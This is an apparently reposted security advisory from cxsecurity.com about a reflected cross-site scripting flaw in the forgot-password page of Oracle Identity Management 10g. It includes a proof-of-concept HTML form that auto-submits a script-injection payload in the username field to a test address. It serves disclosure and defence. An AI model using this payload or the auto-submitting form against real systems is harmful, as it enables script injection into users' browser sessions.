Oracle Identity Management 10g XSS Vulnerability

2012.10.04
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

<!-- Oracle Identity Management 10g (username) XSS POST Injection Vulnerability Vendor: Oracle Corporation Product web page: http://www.oracle.com Affected version: 10g (10.1.4.0.1) Summary: Oracle Identity Management enables organizations to effectively manage the end-to-end lifecycle of user identities across all enterprise resources, both within and beyond the firewall and into the cloud. The Oracle Identity Management platform delivers scalable solutions for identity governance, access management and directory services. This modern platform helps organizations strengthen security, simplify compliance and capture business opportunities around mobile and social access. Desc: Oracle Identity Management suffers from a reflected XSS POST Injection vulnerability when parsing user input to the 'username' parameter via POST method thru '/usermanagement/forgotpassword/index.jsp' script. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user's browser session. Tested on: Oracle Application Server 10g httpd 10.1.2.2.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2012-5110 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5110.php 25.09.2012 --> <html> <head> <title>Oracle Identity Management 10g (username) XSS POST Injection Vulnerability</title> </head> <body> <form name="XSS" method="POST" action="https://192.168.248.132/usermanagement/forgotpassword/index.jsp"> <input type="hidden" name="btnSubmit" value="SUBMIT" /> <input type="hidden" name="username" value='"><script>alert(1);</script>' /> </form> <script type="text/javascript"> document.XSS.submit(); </script> </body> </html>

References:

http://www.oracle.com
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5110.php


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top